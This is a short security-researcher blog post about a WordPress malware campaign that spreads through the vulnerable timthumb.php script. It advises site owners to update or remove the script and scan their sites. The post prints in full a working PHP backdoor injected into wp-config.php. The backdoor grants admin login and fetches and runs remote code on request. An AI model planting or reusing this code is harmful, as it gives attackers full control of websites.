Update to the Superpuperdomain2.com malware

Just a quick update to the Superpuperdomain2.com/Superpuperdomain.com malware infection that has been affecting thousands of WordPress sites with the vulnerable timthumb.php script.

You can read more about it here: http://blog.sucuri.net/2011/08/wordpress-sites-hacked-with-superpuperdomain2-com.html

But now the attackers are also adding the following code to the wp-config.php of the hacked sites:

if (isset($_GET[‘pingnow’])&& isset($_GET[‘pass’])){
if ($_GET[‘pass’] == ’66f041e16a60928b05a7e228a89c3799′){
if ($_GET[‘pingnow’]== ‘login’){
$user_login = ‘admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action(‘wp_login’, $user_login);
}
if (($_GET[‘pingnow’]== ‘exec’)&&(isset($_GET[‘file’]))){
$ch = curl_init($_GET[‘file’]);
$fnm = md5(rand(0,100)).’.php';
$fp = fopen($fnm, “w”);
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo “<SCRIPT LANGUAGE=\"JavaScript\”>location.href=’$fnm';</SCRIPT>”;
}
if (($_GET[‘pingnow’]== ‘eval’)&&(isset($_GET[‘file’]))){
$ch = curl_init($_GET[‘file’]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

It acts as a backdoor, so they can control the site and add more injections/malware whenever they want. If you are running WordPress, check if your theme (or plugin) have this timthumb.php script. If it has, update or remove it now! You can also scan it here to see if it is infected: http://sitecheck.sucuri.net.

Thanks,

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.